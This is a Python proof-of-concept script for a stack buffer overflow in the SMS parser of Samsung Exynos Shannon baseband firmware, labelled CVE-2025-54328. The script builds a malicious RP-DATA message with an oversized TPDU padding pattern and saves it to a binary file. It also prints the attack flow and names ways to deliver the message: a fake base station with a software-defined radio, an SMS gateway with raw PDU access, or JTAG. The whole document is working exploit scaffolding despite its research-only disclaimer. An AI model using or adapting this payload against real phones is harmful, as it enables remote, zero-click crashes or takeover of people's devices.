#!/usr/bin/env python3 """ Conceptual PoC for CVE-2025-54328 Samsung Exynos SMS RP-DATA Stack-based Buffer Overflow This script generates a malicious RP-DATA message with an oversized TPDU payload designed to overflow a fixed-size stack buffer in the Samsung Shannon baseband firmware's SMS parser. Full article: https://www.hunt-benito.com/samsung-exynos-sms-stack-overflow-cve-2025-54328-critical-zero-click-baseband-rce/ FOR EDUCATIONAL AND AUTHORIZED SECURITY RESEARCH ONLY. """ import struct import sys def build_rp_data_overflow(target_number="1234567890", overflow_size=200): """ Build a malicious RP-DATA (Network -> MS) message. RP-DATA format per 3GPP TS 24.011 Section 7.3.1: - Message Type: 1 octet (0x00 = network to MS) - Message Reference: 1 octet - RP-Originator Address: variable (Length + BCD address) - RP-Destination Address: variable (Length + BCD address) - RP-User Data: variable (Length + TPDU) """ msg_type = 0x00 msg_ref = 0x01 rp_originator = b'\x00' digits = target_number.lstrip('+') dest_addr_digits = bytes([(int(digits[i]) << 4) | (int(digits[i+1]) if i+1 < len(digits) else 0x0f) for i in range(0, len(digits), 2)]) dest_len = len(dest_addr_digits) + 1 rp_destination = struct.pack('B', dest_len) + b'\x91' + dest_addr_digits tpdu = bytearray() tpdu.append(0x04) tpdu.extend(b'\x02\x91\x12\xf1') tpdu.append(0x00) tpdu.append(0x00) tpdu.extend(b'\x62\x40\x60\x21\x00\x00\x00') tpdu.append(overflow_size) pattern = b'\x41' * overflow_size tpdu.extend(pattern) rp_user_data = struct.pack('B', len(tpdu)) + tpdu rp_data = bytes([msg_type, msg_ref]) + rp_originator + rp_destination + rp_user_data return rp_data def main(): print("=" * 60) print("CVE-2025-54328 - Conceptual PoC") print("Samsung Exynos SMS RP-DATA Stack Buffer Overflow") print("=" * 60) print() if len(sys.argv) > 1: target = sys.argv[1] else: target = "1234567890" overflow_size = 200 rp_data = build_rp_data_overflow(target, overflow_size) print(f"[*] Target MSISDN: {target}") print(f"[*] Overflow payload size: {overflow_size} bytes") print(f"[*] Total RP-DATA message size: {len(rp_data)} bytes") print() print("[*] RP-DATA hex dump (first 64 bytes):") for i in range(0, min(64, len(rp_data)), 16): hex_str = ' '.join(f'{b:02x}' for b in rp_data[i:i+16]) print(f" {i:04x}: {hex_str}") if len(rp_data) > 64: print(f" ... ({len(rp_data) - 64} more bytes)") print() print("[*] Attack flow:") print(" 1. Baseband receives RP-DATA on NAS/SAPI=3 bearer") print(" 2. Shannon firmware parses RP-User Data field") print(f" 3. TP-UD ({overflow_size} bytes) copied into fixed-size stack buffer") print(" 4. Stack buffer overflows -> return address overwritten") print(" 5. Execution redirected to attacker-controlled code") print() output_file = "cve-2025-54328-poc-rpdata.bin" with open(output_file, 'wb') as f: f.write(rp_data) print(f"[+] Raw RP-DATA message saved to: {output_file}") print() print("[!] To inject this message, you would need:") print(" - A fake BTS (OpenBTS/srsRAN) + SDR (USRP/HackRF)") print(" - Or an SMS gateway with raw PDU mode access") print(" - Or direct memory injection via JTAG/UART on the baseband") if __name__ == '__main__': main()